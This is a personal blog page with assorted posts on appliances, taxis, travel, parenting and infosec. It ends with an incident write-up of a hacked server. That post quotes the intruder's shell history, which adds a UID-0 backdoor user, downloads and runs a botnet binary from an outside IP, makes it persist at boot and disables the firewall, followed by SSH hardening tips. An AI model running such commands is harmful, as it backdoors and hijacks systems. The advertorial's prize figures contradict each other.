LG Washing Machine LG WD-CD1307VM Review

Introduction – LG WD-CD1307VM Review

Somehow, we managed to live for 10 years without actually owning a washing machine – yes..TEN YEARS. In the previous apartment, and in this house for the past 4 years – we even have a spot in the back yard with a plug point, drain and tap.

Finally a Washing Machine! - LG WD-CD1307VM Review

I guess it just never got prioritised, there’s always something more fun, more shiny, more hedonistic, more useless to buy. Utility items are not really romantic and often get pushed way down the list and are only gotten when you REALLY need them.

The dobi (laundry) is near our house, charges reasonable prices, has great service and has never given us any real reason to not go there. Apart from the occasional holes in my clothes, odd socks missing and so on (more on that below).

You can read about Kim’s side of the story here: The single best improvement of our life since Liam besides Liam….

Features

  • Inverter Direct Drive System (smooth & quiet)
  • 6 Motion (gentle on clothes)
  • Durability (with 10 year warranty)
  • Intelligent Washing System (senses contents & optimizes water levels/cycle time)
  • Space Saving (washer & dryer in 1 unit)
  • Various wash modes
  • Time delayed washing

LG WD-CD1307VM

The main features lead to energy savings (inverter and because there’s less friction), the washing performance is better and more gentle. And the motor is the main reason that attracted me to LG with the direct drive there’s no belt to break/wear out and they give an industry leading 10 year warranty on the Direct Drive motor.

Also it’s a large capacity front-loader, front-loaders use less water, less energy, spin faster, heat the water hotter, clean clothes better (and more gently). The downside is of course front-loaders tend to be significantly more expensive.

Having a Washing Machine!

The installation was pretty simple, the technicians did it for us – they did a great job and explained the features of the machine well. It’s every important to make sure your washing machine is seated level on the ground so the drum spins properly and doesn’t damage the motor (hence my spirit level on top of the machine).

LG Washing Machine Installation

I spent the first few months of Liam’s life hand-washing his tiny little clothes, there was a batch to do almost every day – it’s amazing how much laundry a little tiny baby can produce (booties, gloves, onesies, bibs, swaddling clothes, our clothes, sheets etc with his pee/puke on it).

And it multiplies, on a bad day he can have 3 changes of clothes, cause us to change clothes and sometimes make us feel like we want to change our sheets too. So it was becoming unsustainable to be using only the dobi and hand-washing. Here’s him with his clean duds, clean sheet, clean blankets and clean all the things :)

Liam

We used the dobi for a long time (regularly for 10 years), here’s my pros and cons:

Pros

  • Very little effort required, just drop off the clothes, pick them up clean, folded and sorted
  • Clothes are clean and dry
  • Convenient
  • Easy to get things ironed straight after
  • Large items are packaged and wrapped neatly for storage (sheets, duvets, protectors etc)

Cons

  • Commercial washing machines are rough (holes in clothes, burst seams etc)
  • It takes time, minimum 1 day, usually 2
  • It’s costly compared to washing at home
  • Don’t know what kind of washing detergent they use
  • All washes are the same, can’t do other stuff like was shoes, gentle washes, intensive wash
  • Have to dry out smelly sports clothes at home (not pleasant)

I bought this t-shirt from Marks & Spencers and I really love it (and it was quite expensive) and the first time I washed it at the dobi…it came back with holes in it – gutted.

Holy T-shirt

Also one more really bad con, was I used to use the dobi in my appartment complex long ago and once when I was away for a few weeks on a work assignment…they closed down and disappeared. And yah, all my clothes were there – all my favourite clothes!

One of the great things I found about this machine in particular too is it has a shoe mode (not sure how common that is) – but my shoes are stored outside and got super nasty/dusty/hairy etc and were basically unwearable.

LG Shoe Wash Mode

The shoe mode is basically especially designed for washing shoes without damaging them – super useful!

Shoe Washing

But after a round in the machine, boom as good as new – couldn’t believe it. I can finally wear all my cool sneakers again (I had a really sloppy slippers only period, which I’m over now haha).

There’s some other useful features too like the Intensive wash mode for my stinky sports clothes, a built in tub cleaning cycle (the technicians recommend doing this about once a month, you can buy tub cleaning solution from Cosway).

I also really love that it calculates how long it’s going to take to complete the selected cycle and displays the time remaining on the front, great for planning when you need to hang the washing out.

LG Washing Machine

The scheduling is useful too, it shows the number of hours until the selected cycle completes – good when you want to wash some stuff late at night and hang it out the next day. I honestly didn’t feel like running/playing badminton so much because of the stinky clothes I generate – now it’s not a problem.

Seriously I can use 3 t-shirts in one badminton session + shorts, boxers, 2 towels and so on. Previously they would be festooned all over the house stinking the place up – now they are in the washing machine as soon as I get home and washed/hung-out before bed time. So awesome.

Conclusion

So yah, having a great time so far – no real cons with the machine I’ve noticed so far. It’s super quiet and doesn’t vibrate even during fast spinning, it looks good and suits our design aesthetics (which is a bonus of course). Not a big fan of the traditional white enamel style washing machines, this grey/silver spaceship look suits me much better.

The RRP for this machine is RM5499 – worth every cent if you ask me. I’ve already written so much about it, I’ll have to talk about the drying feature some other time. It’s super easy to use, I love it, in fact the first few days after getting it I just kept washing stuff because it was so fun and easy haha.

I put a load in just now actually.

GAZ_7394_RAWx800

If you have any questions, do ask in the comments below I’ll do my best to answer.

The full range of machines available from LG can be seen here – Washer Dryers (our machine).

You can check out the current year end promotions from LG here – LG Malaysia Promotions.

Tags: , , , , , , , , , , ,

Continue Reading · No Comments · Children, Family, House/Reno

Less Than 4 Minutes On Sky News

Yah, that’s what I appeared for recently haha. I did a short segment on SkyNews regarding the Sony hack and the possibility of it being a North Korean cyber warfare strike.

Sky News Logo

Short segment but I think we covered quite a lot of ground, I’d love to have talked about it a bit more – but well I looked like a dishevelled hobo with a cool flaming mario t-shirt.

It’s a pretty interesting story and I did a summary post about it on Darknet here: Sony Pictures Hacked – Employee Details & Movies Leaked.

Yah my claim for fame this month haha.

Tags: , , , , , ,

Continue Reading · No Comments · Hacking & Infosec, Media Coverage

My Experience With Uber vs MyTeksi In Malaysia

So yah, if you live in Malaysia you know about the taxi situation. I’m pretty sure we’ve all had some experiences with the poorly maintained, rude, cut-throat taxi drivers that are one of the worst things about this beautiful country.

Even if you don’t take taxis much (like me), you will experience them driving like absolute dicks on the road. One even banged me before, Stupid Taxi Drivers..

Uber vs MyTeksi in Malaysia

Taxi Drivers in Malaysia are Known For:

  • Not wanting to use the meter.
  • Refusing the journey if it’s too ‘short’, too ‘long’
  • Refusing or charging extra because it’s vaguely jammed along the way
  • Refusing or charging extra because or it’s raining.
  • Driving like idiots (not signalling, stopping abruptly, blocking traffic etc)
  • Having poorly maintained cars
  • Having smelly/smoky cars
  • Playing weird music
  • Talking crap
  • Not knowing how to go to the destination (or sometimes where it is)

There’s more, but yah – you get the gist of it. Anyway, thankfully in the past few years there’s been a few startups trying to address this issue. I did try radio cabs (Sunlight) before when my car was in the workshop for an overhaul, and well that didn’t go very pleasantly either – No Taxi – Malaysian Taxis Are Teh SUCK.

So yah, I’m super grateful for MyTeksi, EasyTaxi, Taxi Monger and more recently of course (with all the drama attached) – Uber.

Anyway, recently I’ve had quite a few events in KL and Bangsar, and I decided not to drive, so on both occasions I took MyTeksi from home to the venue, and Uber back. Partially because where I live (in the ‘burbs) there are no Uber cars, and partially because I wanted to compare the prices/service etc. As I’ve heard quite often Uber, works out cheaper. So yah, here is my take on Uber vs MyTeksi In Malaysia.

MyTeksi

MyTeksi Logo

So MyTeksi has been around quite a while, now generally known as GrabTaxi (regionally) because the localised spelling of Teksi made no sense outside of Malaysia. They are well funded, and just got another $65 Million USD (Taking the total to $90 Million USD).

They exist to solve the problem with errant taxi drivers in Malaysia and allow some kind of rating system, plus removal of drivers from the system that get bad reports against them. All drivers must use the meter.

Pros

  • Pretty easy to find a taxi, wherever you are in KL (even in my ‘burb)
  • Easy to use app
  • Usually get a taxi quite fast

My experience on the whole with MyTeksi has been a positive one, the app has worked well, the taxis have always arrived in a timely fashion, been polite, driven well and charged according to the meter.

Cons

  • It’s still a Malaysian taxi..many are badly maintained, old, smelly etc
  • Can be hard to find a taxi when it rains or during rush hours (even though are a lot around, no-one accepts)
  • The drivers still really actively choose if they want to pick you up or not
  • The receipt is basic and doesn’t let you know the cost or show you the route the car took
  • Can cost more than Uber (especially if there’s traffic etc)
  • You need to carry cash, there’s no other way to pay in Malaysia
  • If the driver did overcharge you, there’s not much you can do

Uber

Uber Logo

So Uber is a fairly new contender on the block and has caused a lot of drama recently with the issues of legality, the threat to the taxi industry and so on. It’s been around since 2009 and is also heavily funded, but just came to Malaysia fairly recently.

It’s like a ridesharing + limo service app – which is cool.

Pros

  • If there is a car in your area, it has to come and it will. The drivers are employed.
  • The cars are clean, new and comfortable (I’ve had a Camry both times).
  • The drivers are polite, ask you if you like the music and drive well
  • The cars often have free mineral water (great if you’ve been drinking)
  • You don’t need cash
  • Splitting the cost of a ride is super easy
  • If the driver went the wrong way, Uber will correct the fare and give you a refund
  • The receipt is very detailed and even shows you the route you took on a map.

Uber Route

Cons

  • It can be hard to get a car, especially if you aren’t in central areas (KL, Bangsar etc)
  • Can be expensive if it’s a really popular time (multipliers)

Honestly I’m really struggling here to find any negatives with Uber.

As for the cost, the first trip which was from my house to KL center (Starhill) the Taxi from MyTeksi cost RM48 (mostly due to the epic jam) – the estimated fare was RM21-32. The return trip with Uber cost RM31. The 2nd trip was more similar, with the Taxi it was RM30 (from my place to Bangsar South) and to come back with Uber was RM32.

If I have the choice, Uber will always be my #1. If no Uber cars are available then I’ll use MyTeksi.

If for some reason, you haven’t yet signed up for Uber, please do so here:

https://www.uber.com/invite/ubershaolin

Tags: , , , , , , , , , , , ,

Continue Reading · 2 Comments · Serious Issues

Going Almost Viral On Facebook – Yusuf Taiyoob Meme

Almost viral? Isn’t that like almost famous, or almost rich? Yah it’s not famous, or rich or in this kind viral (even though it kinda is). Anyway.

I make funny videos on instagram sometimes, I made a bunch in Europe in different countries (I meant to do one for each country, but yah I failed at that). You can see them on Instagram with the hashtag #daviesfunnyvids.

So I always knew the formula for success was a white dude speaking BM, so I did a video in that format around Hari Raya because the Yusuf Taiyoob adverts on the radio are too hilarious. If you’re not familar, they are near pornographic.

The most famous Yusuf Taiyoob meme image would be this one I guess:

Yusuf Taiyoob

Anyway I did my video about this, and it was kinda popular. It was ok on Instagram but it got a little bit wild on Facebook.

Ending up with over 600 likes, over 250 comments and over 1300 shares. Not too bad right, I thought it’d could have gotten much more but I just don’t have that kind of audience.

But then someone stole it, who did have the right kind of audience, guess what happened? Yah it went nuts haha with almost 16,000 likes and almost 6000 shares but no credit back to me and it wasn’t shared from the original video (they basically downloaded it, then re-uploaded on their own page).

Stolen Viral Video

What can I do? Nothing really, just enjoy the fact that I did get some kind of popularity from the video haha. I still have about 400 pending friend requests from that period.

There was even some people meme-ing me, as apparently to every Malay person I look like the WWE wrestler Big Show. Yah every time I buy a Ramly burger, it’s almost guaranteed the chap selling the food will say “Wah, abang macam big show lehh”.

Big Show Makan Kurma

So yah, it was fun, it was interesting, I shall have to think of more funny videos that I can do speaking BM.

That was my 20 minutes of fame I guess.

Tags: , , , , , , , , , , ,

Continue Reading · 2 Comments · Internet & Tech, Weird/Humour

Learn Stock Trading – It Can Be Fun!

I’ve always had a certain interest in stock trading and finance and always wanted to learn stock trading, learn more about how it works, how to benefit it from it etc. But most of the resources about it are dry, tedious and cover fascinating topics like technical analysis.

I have some investments in the stock market, but not directly, via a Unit trust. And I do have some investment in Gold, which of course is a completely different market to stocks (with it’s own challenges). I do like numbers though and challenges, so through-out the years I’ve always been picking up knowledge here and there about the different types of investments and trading (futures, forex, stocks, shares etc).

Learn Stock Trading

I even bought this book more than 10 years ago, but it put me to sleep every time I tried to read it. And all the new language to learn (bullish, bid size, ask size, ask price, percentage spreads, closed-end funds etc).

Financial Times Book

It can be quite a daunting subject to learn about, and of course it concerns money so people’s first instinct is to play it safe. So yah, that didn’t help much.

Now I have a child, I have to think about his future too, and of course it’s important to me that he be financially smart and make informed choices on what to do with his resources. What I found recently was an interesting online virtual trading challenge based around real-time data from Bursa Malaysia by KenTrade by Kenaga.

It simulates real equity market trading very closely and can demonstrate it’s not actually that complex, with the added bonus if you do find yourself really good at it – you can win yourself a Volkswagen Jetta worth RM130,888. And well, how else are you going to get to trade with RM1 Million? Haha.

KenTrade by Kenaga

You don’t have to be top to get something too, if you are one of the top 66 participant with the highest percentage growth in your virtual portfolio, you stand the chance to win a cash prize (to get the car you have to be in the top 20).

You don’t have to be top to get something too. If you are one of the top 33 participants in the public and student category respectively with the highest percentage growth in your virtual portfolio, you stand the chance to win a cash prize (to get the car you have to be in the top 10 in these categories).

If you do wanna try it out, head over to https://game1.kentrade.com.my/KenTradeGame/ and sign up for the Kentrade Trading Challenge by Kenanga or you can head over to https://www.kentrade.com.my/KenTrade/ to find out more.

Contest runs from October 13 to November 7, while registration ends on October 20. Upon signing up, send a screenshot of your registration and quote ‘ShaolinTiger’ over to KenTrade@kenanga.com.my and stand a chance to win a mystery prize!

Tags: , , , , , , , ,

Continue Reading · No Comments · Advertorial

Bangkok – Our Favourite City in Asia? And Some Tips

So yah, Bangkok..I was supposed to write this post back in 2011 sometime I guess haha, I started with 1 picture in October 2011 but it got kinda stuck there.

We really love Bangkok, we’ve been back a couple of times since – but this was our first trip so it was kind of special and it was a surprise birthday trip for Kim as well. I was trying to be more romantic, proactive etc as I was a bit of a bum most of the time haha. Plus she’d mentioned MANY times she wanted to go shopping there, check out Chatuchak etc.

Anyway I decided on Bangkok as I’d heard so many good things about it, we’d both been to Thailand and absolutely loved the food and people there but we’d never really explored Bangkok properly, and definitely not together so I went for it, I booked with AirAsia go and chose a cute boutique-ish hotel bang in the middle of Chinatown called Shanghai Mansion.

Bangkok has a whole bunch of cute and quirky hotels at reasonable prices, so do have a look outside of the chains for something different.

Anyway we arrived safely and checked in, and we were hungry, seen as though it was birthday girls weekend I let her choose what to eat…she chose to eat a whole suckling pig right next to the hotel and it was AWESOME. You can see her post about it here – The suckling pig in Bangkok.

Roast Suckling Pig

It was a bit different from the style we get here in Malaysia, it was nice but honestly we preferred how they do it here. The cool part was though they stir fried the rest of the meat with salt and pepper, which made a delicious dish to eat with our rice/veges.

We lucked out staying in Chinatown too and discovered one of our absolute favourite restaurants in Bangkok just walking distance from our hotel, more here – T&K Seafood in Bangkok’s Chinatown.

What we really adore about Thailand and especially Bangkok is the street food, it’s EVERYWHERE, it’s cheap, there’s loads of pork and it seems impossible to have a bad meal in Thailand. I mean just look at how amazing their chap fan/mixed rice is:

Thailand Mixed Rice

One thing you fast learn about Bangkok is, stick to taxis if you want to get somewhere in comfort. Taking a tuk tuk is fun, but only do it for that reason. A tuk tuk is not really any cheaper than a taxi (unless you’re perhaps a local), there’s no aircon, if it rains it sucks, if you get stuck behind something spewing diesel fumes it sucks and they will constantly hassle you to make ‘stops’ to help them out.

Every stop you make will reduce your fare by 20-40baht but take about 10-20 minutes each time, it’s worth doing once maybe just for fun. We actually did 3 stops just for shits and giggles and got the tuk tuk ride for free.

Tuk Tuk ride

But if you want to get anywhere just take a taxi, another important lesson to note – ALWAYS hail a moving cab, never take one parked at the road side (they tend to be the lazy, unscrupulous drivers).

As far as food goes there a few dishes you absolutely must try the authentic versions of in Thailand, one is Pad Kra Pao (or Krapow) which is basically minced pork fried with loads of basil – super delicious. This one was inside Chatuchak market:

Pad Kra Pao

The other is of course braised pig leg rice which you can find everywhere and the good ones will simply blow your mind. Talking of Chatuchak, the place is immense and there’s a LOT of people, if I can give you one tip for Chatuchak it is – if you see something you like, just buy it, because the chance of you being able to locate the same stall again is slim to none.

Chatuchak Market

The birthday girl had a great time shopping of course and LOVED Chatuchak market as expected.

Kimberlycun at Chatuchak

The other place we’d heard a lot about was Platinum Mall so we spent a day there to check it out. Talking of stewed pork leg, the one at the Platinum Mall food court is definitely one of the best ones I’ve had, so if you do head there – check it out!

Platinum Mall - Bangkok

Platinum mall is like a smaller, more comfortable version of Chatuchak with aircon and much easier to navigate. The major downside I noticed was there’s very little mens stuff in Platnium, compared to Chatuchak which also has other interesting sections (home, gardens, pets etc).

But the shopping experience at Platinum is much less sweaty and the food in the food court is tops! But even then, we still headed back to Chatuchak the next day for another go haha, and we managed to locate the legendary coconut ice cream, another memorable food from BKK.

Chatuchak Coconut Ice-cream

So yah that sums up Bangkok pretty much, shop, food, shop, food, massage, pass out – wake up and repeat. Super awesome!

Kinda miss Bangkok actually, can’t wait to take Liam there! Although now I’m older, I kind of enjoy the serenity of Bali too. Ah so many places to go…haven’t even been to Japan at all yet!

Tags: , , , , , , , , , , ,

Continue Reading · 2 Comments · Thailand, Trips & Travel

What It’s Like To Be The Father Of A Premature Baby (Premie)

Pregnancy itself is a roller-coaster, even the ideal pregnancy I would imagine is quite a stressful experience for the first time parents (especially the one with a tiny human growing in her belly). We honestly did not have the easiest pregnancy, at some points it was downright terrifying – especially seeing blood during the exact time when we were supposed to announce to the World that we were having a baby. The magical 3 months mark – Red tide.

And yes it happened again in May, not a good sign, but nothing we could do – nothing the Doctor could tell us..and upon reading far too much, is fairly normal (happens to about 20% of pregnant women). The only bad part, was it’s a fairly strong indicator of premature birth.

There’s 2 things in life I really strongly dislike, complaining and worrying (almost the same thing in fact..). Worry is pointless, if you can do something about it, do it. If you can’t, worrying isn’t going to change anything. Same for complaining, don’t complain, do something to change it, fix the situation, take action – don’t just whinge.

A lot of it can be alleviated by knowledge anyway, read, read, educate yourself and it becomes a lot easier to not worry (or the opposite sometimes when you read too much). Anyway, that’s my philosophy in life and I had to work extra hard to maintain it at certain points during the pregnancy, as it wasn’t an easy one in general.

On the whole it was wonderful though, Kim felt great and she was a glowing, beautiful, vibrant surprise pregnant lady (we consider a surprise mom when you see a hot chick from the back and she turns to the side or around and boom there’s a massive baby bump). She had very few serious symptoms, some morning sickness early on, no really crazy cravings, not much pain/discomfort. Other than the blood etc, it was a textbook pleasant pregnancy.

It was pretty stressful though, every day without blood was a blessing. Then things escalated fairly quickly, 11th July (around 29 weeks gestation) we had ‘The Show’ which is technically the body of the mother saying it’s ready to party, let’s get the baby out. I saw what looked an awful lot like a mucus plug (yes I Google Imaged it..I don’t recommend doing that).

This is when I started reading voraciously about all kinds of symptoms, probabilities, birth stages (micro preemies, early preemies, moderately premature etc etc), and was hoping we could make it to at least 34-35 weeks gestation as our little man would be pretty much fully developed by then and fairly well equipped to come out.

After ‘The Show’ we went to A&E and called our Doctor in to check things out, she said the cervix was a little soft and having a look at the picture of the mucus plug..she said it did very much look like a show and we needed to take precautions for premature birth – which is basically 2 steroids shots 12 hours apart to help along the lung development of the little one when he comes out.

As far as babies go, all systems are pretty much go from 28 weeks onwards, but the lungs are last to develop and be ready to take in outside air. Preemie lungs have issues due to a lack of surfactant which basically lubricates all the little tubes and stops them collapsing.

Most premature babies are born with some kind of respiratory distress (Which is why you see them on breathing apparatus). Anyway the earliest preemie stage which is unlikely to have any serious long term effects in 32 weeks, also has a 98% survival rate – which is good obviously.

Anyway after the steroid shots Kim just took it easy and was pretty much on bed rest, not moving a whole lot. We were just hoping and praying (in a non-religious way) that he would stay in as long as possible, as the last few weeks of gestation are when there is exponential growth and development of the body, brain, immune system, nervous system and much more.

So yah, July 30th I was supposed to go to the office, but Kim didn’t seem to be feeling to well, and I just had a bad feeling and thought I should stay at home. Lucky I did as the missus stayed in bed all day, she went to pee around 5pm and I heard a scream from upstairs.

I rushed up and found a wet floor..which I examined closely (yes I smelt it)…you smell it to make sure it’s not pee, to make sure it has no foul smells and you check it to make sure it’s clear and has no black/green tint. A black/green tint would indicate the baby is not coping well and needs to come out ASAP (emergency C-section).

The water had broken, but it didn’t seem to be a lot..you can read this part from Kim’s perspective too here: I have popped and this is how it went down..

Anyway, however little or much water broke (I suspected it was the hind waters, not the main sack) we rushed to the hospital and went straight into a labour room. I read up and found the probability of going into labour in the next 24 hours was 50% or higher. I was hoping we were in the other 50% that could go 4-6 weeks with a drip/leak/hind water burst as amniotic fluid does constantly regenerate and after an ultrasound the main sac was still full.

Stay positive and all that, I hung out in the hospital till about 3am then went home to get some sleep. There was no contractions or major dilation (around 1cm) so we were hopeful that he could stay in until at least 36 weeks.

But no, he wasn’t having any of it. I got a panicked call from Kim around 10am saying it was on, she was having major contractions and they’d started at about 5.30am and were getting closer and stronger.

I decided I should probably go into the hospital, so I packed the bag full of stuff we might need and off I went.

It was all very sudden, we seriously had nothing ready – we had a stroller and a car seat I bought because I saw the exact model we wanted on sale. But literally nothing else, no clothes, no diapers, no cot, nothing.

I got to the hospital and Kim was already super drowsy from the gas and air she was sucking on like a crack pipe, she wouldn’t let it go. I have to say, that contraction business looks bloody painful. By about 11am she was screaming for an epidural, but the Doctor said it was too late, she was already 6cm dilated (so 60% of the way there), her contractions were too close together and she was progressing that fast it was going to be over soon anyway.

She was grabbing my hand so hard my fingers almost dropped off (ribena purple they were), but hey, I was happy to bear that rather than pooping out a 2kg human from any of my body orifices.

Things went pretty fast and our son was born pretty smoothly at 1.52pm July 31st 2014 without complications at 32 weeks 4 days (other than him being almost 8 weeks early) his due date was September 22nd. So yah, he was supposed to be born yesterday (relative to when the this post was written).

But as someone so wonderfully put it, this way we get to spend an extra 2 months with him!

Seeing your wife give birth naturally (or even cesarean I would imagine) is not an experience for the faint hearted, government hospitals no longer let the fathers be present during birth as they just don’t have enough resources to deal with all the fainting/puking etc.

Thankfully my constitution is ok I think as I managed to stay concious through-out the entire thing, and didn’t puke and even took some pictures of ‘that’ moment. Although I wasn’t exactly looking directly, so I think they are blur/overexposed haha.

This is how he looked when he was born, covered in the waxy vernix layer, goo and blood having any residual amniotic fluid/gunk sucked out of his nose/mouth with a tube wrapped in a plastic bag to keep him warm. The first thing he did? Peed on the nurse – good lad! Not exactly cute at this stage tho.

32 Week Old Premature Baby

Kim was fine afterwards just tired, she had a sleep and I went to see baby Liam in NICU (neonatal intensive care unit) where we spent many hours for the next 3 and a half weeks. More about that later, I took her up to see him the same day so they could meet the day he was born. We couldn’t hold him yet though as he was still on the CPAP machine (Continuous Positive Airway Pressure) as he did have some respiratory distress.

So the first time mommy and me could hold him was the first day after his birth. He even opened his eyes a bit and grabbed my finger like a little boss, we were so proud that he was already off the CPAP and onto the regular nasal prongs. Far cuter, like a little wrinkly old man.

32 Week Preemie

So yah, that’s the story of our pregnancy and birth from my perspective, and the first thoughts/feeling of being the father of a premature baby. My #32weeker :)

If you want to see far too much of him, just follow me on Instagram @ShaolinTiger and his Mommy at @Kimberlycun.

Tags: , , , , , , , , , ,

Continue Reading · 2 Comments · Children, Family

Advanced Information Gathering AKA Google Hacking at HITB 2004

So this was the first real talk I gave, I’d just moved to Malaysia not long beforehand and I’d started work at NSS as the lead for the penetration testing team. We were a sponsor of Hack in the Box 2004 so we got a speakers slot, but it couldn’t be a product/company pitch it had to be a proper infosec/technical talk which passed the regular CFP (Call for paper) requirements.

It was decided that I give the talk..I was very nervous as you can imagine, even back then it was rather a large conference, and this was my first real shot at talking. Looking back at the slides 10 years later though, I think I did a pretty good – much of the information is still relevant today.

And when I gave the talk the room was packed, people were standing and listening. I think because it was actually one of the less technical talks, more people could enjoy it – it went down really well. The subject was something I did at work, and often the first stage in a penetration test – information gathering. Arguably it’s also the most important phase as it gives you all the entry points and people to target in later phases. The hot keywords at that time were Google Hacking and the GHDB (Google Hacks Database).

Information Gathering AKA Google Hacking

It was about 6 years after this that I gave me next talk, not sure why – perhaps just lack of opportunity. I also did an interview with The Star afterwards titled Guarding against Google hacking, where I met Chris Chong.

Google Hacking - The Star

The talk covers the lesser known aspects of Google, tools such as Athena and Sitedigger and the amount of random misconfiguration that can be found with a little careful search engine manipulation. Other useful public databases will be covered with some details on how to leverage the maximum amount of detail on any given target.

Also an introduction to the Google API and how it can be used or abused during a penetration test or hack attempt. This presentation will include a live demonstration in which the above techniques will used to gather coveted information about both random and targeted organizations.

So here are the slides:

And the video (yah we had recordings back then, shared via Torrent!):

Enjoy!

You can see all my talks given here.

Tags: , , , , , , , , , ,

Continue Reading · No Comments · Hacking & Infosec

An Anatomy Of A Hack – Weak ROOT Password

So a peaceful Sunday night, I get an odd bandwidth warning for a development/testing server that a developer recently created. It was doing some fairly immense traffic, peaking at 80mb a second and averaging about 8mb/s – definitely not normal.

Image 2014-08-31 at 8.42.18 PM

I tried to access the server via SSH but couldn’t connect at all, port 22 was connection reset by peer (which indicates a block or drop) and our normal port wasn’t responding at all.

I accessed the server via the Linode LISH console, but it wasn’t accepting any of our secure passwords, so I shut it down and used the Linode manager to reset the root password. This then allowed me to boot it up and access it via LISH with the root user.

What I discovered next was the reason why I couldn’t SSH in either on port 22 the default port, or our regular SSH port (which is not 22). I could see from these lines in the .bash_history for root that SSH had been blocked for everyone except 2 IP addresses.

    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny

Which would prevent any SSH access at all.

So they logged in, created a user called restart, blocked everyone but 2 IP addresses from accessing via SSH, then downloaded a piece of malware (or what I assume to be a botnet client) from the first IP address http://121.12.168.62:6789/com

Then they ran this, and added it to /etc/rc.local to make sure it runs on restart. Here’s the full history:

    1  w
    2  uname -a
    3  ethtool eth0
    4  ifconfiog
    5  ifconfig
    6  last
    7  useradd -g 0 -u 0 -o restart
    8  echo restart:restart |chpasswd
    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny
   12  cd /tmp/scp
   13  ls
   14  chmod 777 *
   15  ./x 5.153
   16  ls
   17  chmod 777 *
   18  ./x 5.153
   19  cd /etc
   20  wget http://121.12.168.62:6789/com
   21  chmod 0755 com
   22  ./com &
   23  chattr +i com
   24  echo "cd  /root/">>/etc/rc.local
   25  echo "./com&">>/etc/rc.local
   26  echo "/etc/init.d/iptables stop">>/etc/rc.local

I uploaded the malware to VirusTotal to scan it and see what it turned up:

VirusTotal Scan

The only decent description I found was from Telus:

Backdoor.Linux.Ganiw.A is a Backdoor and Bot agent that targets the Linux platform. The malware contacts a remote server, identifying itself, and sending system information. In addition, it receives control commands to perform various nefarious activities on the infected system. Moreover, the malware has the capabilities to embark on different types of DoS attacks. To survive a system reboot, it adds an entry to the initialization directory “/etc/init.d”.

As for the actual entry, it seems like the password was popped by a different IP address (Also from China), and then later on the same day, it was logged into by our main IP address 121.12.168.62.

Aug 30 01:46:43 li737-216 sshd[20132]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:45 li737-216 sshd[20134]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from 60.172.228.102 port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4670 ssh2]
Aug 30 01:46:58 li737-216 sshd[20134]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:00 li737-216 sshd[20136]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from 60.172.228.102 port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4526 ssh2]
Aug 30 01:47:12 li737-216 sshd[20136]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:14 li737-216 sshd[20138]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:15 li737-216 sshd[20138]: Failed password for root from 60.172.228.102 port 3781 ssh2
Aug 30 01:47:25 li737-216 sshd[20138]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 3781 ssh2]
Aug 30 01:47:25 li737-216 sshd[20138]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:27 li737-216 sshd[20140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:29 li737-216 sshd[20140]: Failed password for root from 60.172.228.102 port 4405 ssh2
Aug 30 01:47:39 li737-216 sshd[20140]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4405 ssh2]
Aug 30 01:47:39 li737-216 sshd[20140]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from 60.172.228.102 port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 1662 ssh2]
Aug 30 01:47:54 li737-216 sshd[20144]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:55 li737-216 sshd[20146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from 60.172.228.102 port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2

Then the login:

Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from 121.12.168.62 port 3117 ssh2

As a rule I disable root login via SSH, move it to a different port (not 22), disable password based logins, and use a limited list of users that can access SSH. This makes it pretty secure and can be done with the following SSH settings:

Port 888
PermitRootLogin no
PasswordAuthentication no
AllowUsers YOURALLOWEDUSER

Then restart SSHd of course. Generally choose a port below 1024, as then it’s still a privileged port and can’t be hijacked by a non-root user (for the paranoid).

This server was only 11 days old, fortunately it has nothing important on it and doesn’t have access to anything else. Just be warned, even if you are disabling root login later, put a secure password in from the start..as you might forget about the server for a while.

And then it’ll get owned by some Chinese hacker and turned into part of their botnet for hire.

There’s really not ever any excuse to have a weak root password.

Tags: , , , , , , , , ,

Continue Reading · 2 Comments · Hacking & Infosec

